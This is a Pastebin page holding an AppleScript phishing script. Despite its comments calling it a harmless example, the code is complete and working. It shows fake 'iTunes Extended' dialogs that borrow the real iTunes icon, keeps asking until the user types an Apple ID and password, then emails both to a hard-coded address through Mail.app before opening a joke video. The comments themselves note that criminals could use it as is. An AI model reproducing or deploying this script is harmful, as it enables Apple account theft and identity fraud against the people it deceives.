Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --This code is not meant to be harmful.
- --This is a example of how one can make a malicious script, and can fool people who think it is real.
- --The email the information goes to is mine, and completely safe (saying this, don't put your actual information in because I don't want to get into any trouble if anything happens
- --People who want to do bad to the world can use this script (why would you want to steal someone's identity you little criminal!) if they are lazy enough to not make their own.
- display dialog "iTunes Extended: An iTunes 3rd Party Extension " with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
- ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Continue"} default button 1
- set appleid to ""
- repeat while appleid = ""
- set appleid to the text returned of (display dialog "Type in your Apple ID to continue" & " (ex. \"[email protected]\")." default answer "" with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
- ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Continue"} default button 1)
- if appleid = "" then
- display dialog "No Apple ID Entered. Please enter your Apple ID. An example of an Apple ID is: \"[email protected]\"" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
- ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Resubmit"} default button 1
- end if
- end repeat
- set pass to ""
- repeat while pass = ""
- set pass to the text returned of (display dialog "Type in your Password to finalise." default answer "" with title "iTunes Extended Ver. 23.5.6" with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
- ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Finalise"} default button 1 with hidden answer)
- if pass = "" then
- display dialog "No Password Entered. Please enter your password." with icon "Macintosh HD:Applications:" & "iTunes.app" & ¬
- ":Contents:Resources:" & "iTunes.icns" as alias buttons {"Resubmit"} default button 1
- end if
- end repeat
- tell application "Mail"
- set theMessage to make new outgoing message with properties {subject:" ", content:"Apple ID:" & appleid & " Password:" & pass}
- tell theMessage
- make new to recipient at end of to recipients with properties {name:"Apple", address:"[email protected]"}
- end tell
- send theMessage
- end tell
- tell application "Safari" to (activate) & (open location "https://www.youtube.com/watch?v=dQw4w9WgXcQ")
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement